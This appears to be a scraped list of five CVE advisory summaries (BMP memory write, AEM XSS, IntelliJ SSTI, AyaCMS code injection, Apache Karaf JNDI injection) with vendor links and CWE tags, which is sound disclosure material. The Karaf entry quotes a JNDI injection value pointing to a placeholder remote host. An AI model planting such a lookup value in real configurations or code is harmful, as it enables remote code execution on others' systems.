CVE-2022-38143
https://notcve.org/view.php?id=CVE-2022-38143
A specially crafted BMP file can write to arbitrary out-of-bounds memory, which can lead to arbitrary code execution. • https://security.gentoo.org/glsa/202305-33 https://talosintelligence.com/vulnerability_reports/TALOS-2022-1630 • CWE-123: Write-what-where Condition CWE-787: Out-of-bounds Write •
CVE-2022-44510 – AEM Reflected XSS Arbitrary code execution
https://notcve.org/view.php?id=CVE-2022-44510
Adobe Experience Manager version 6.5.14 (and earlier) is affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. • https://helpx.adobe.com/security/products/experience-manager/apsb22-59.html • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •
CVE-2022-47896
https://notcve.org/view.php?id=CVE-2022-47896
In JetBrains IntelliJ IDEA before 2022.3.1, code templates were vulnerable to SSTI attacks. • https://www.jetbrains.com/privacy-security/issues-fixed • CWE-94: Improper Control of Generation of Code ('Code Injection') CWE-1336: Improper Neutralization of Special Elements Used in a Template Engine •
CVE-2022-46101
https://notcve.org/view.php?id=CVE-2022-46101
AyaCMS v3.1.2 was found to have a code flaw in the ust_sql.inc.php file, which allows attackers to cause command execution by inserting malicious code. • https://github.com/loadream/AyaCMS/issues/6 • CWE-94: Improper Control of Generation of Code ('Code Injection') •
CVE-2022-40145 – Apache Karaf: JDBC JAAS LDAP injection
https://notcve.org/view.php?id=CVE-2022-40145
This vulnerability is about a potential code injection when an attacker has control of the target LDAP server used in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource uses InitialContext.lookup(jndiName) without filtering. A user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI and an attacker has control of the target LDAP server. This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. We encourage users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8. • https://karaf.apache.org/security/cve-2022-40145.txt • CWE-20: Improper Input Validation CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') •